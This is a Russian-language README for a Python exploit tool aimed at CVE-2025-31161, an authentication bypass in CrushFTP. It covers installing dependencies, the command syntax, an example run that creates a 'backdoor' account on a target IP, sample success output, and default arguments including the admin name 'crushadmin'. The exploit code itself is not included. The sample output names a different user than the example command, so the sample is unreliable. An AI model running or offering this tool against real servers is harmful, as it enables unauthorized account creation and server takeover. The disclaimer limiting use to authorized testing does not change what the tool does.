
🛡️ CVE-2025-31161 - CrushFTP: эксплойт обхода аутентификации при создании пользователя

Этот эксплойт на Python нацелен на серверы CrushFTP, уязвимые к CVE-2025-31161. Уязвимость позволяет неавторизованное создание учетных записей пользователей путем отправки специально сформированного XML-пейлоада в WebInterface, что потенциально приводит к полной компрометации сервера.
Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
Несанкционированное использование в отношении систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
requestscoloramaDebian/Ubuntu:
sudo apt update
sudo apt install python3 python3-pip -y
CentOS/RHEL:
sudo yum install python3 python3-pip -y
macOS (с Homebrew):
brew install python3
pip3 install requests colorama
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!
[+] Preparing Payloads
[-] Warming up the target...
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully!
[+] Exploit Complete! You can now login with:
[*] Username: AuthBypassAccount
[*] Password: CorrectHorseBatteryStaple
Gaurav Bhattacharjee (G4UR4V007)
Этот проект лицензирован в соответствии с лицензией MIT.
| Аргумент | Описание | Значение по умолчанию |
|---|
--target_host | (Обязательно) IP или домен цели | — |
--port | Порт WebInterface CrushFTP | 8080 |
--target_user | Имя администратора (используется в пейлоаде) | crushadmin |
--new_user | Имя новой неавторизованной учетной записи | AuthBypassAccount |
--password | Пароль для нового пользователя | CorrectHorseBatteryStaple |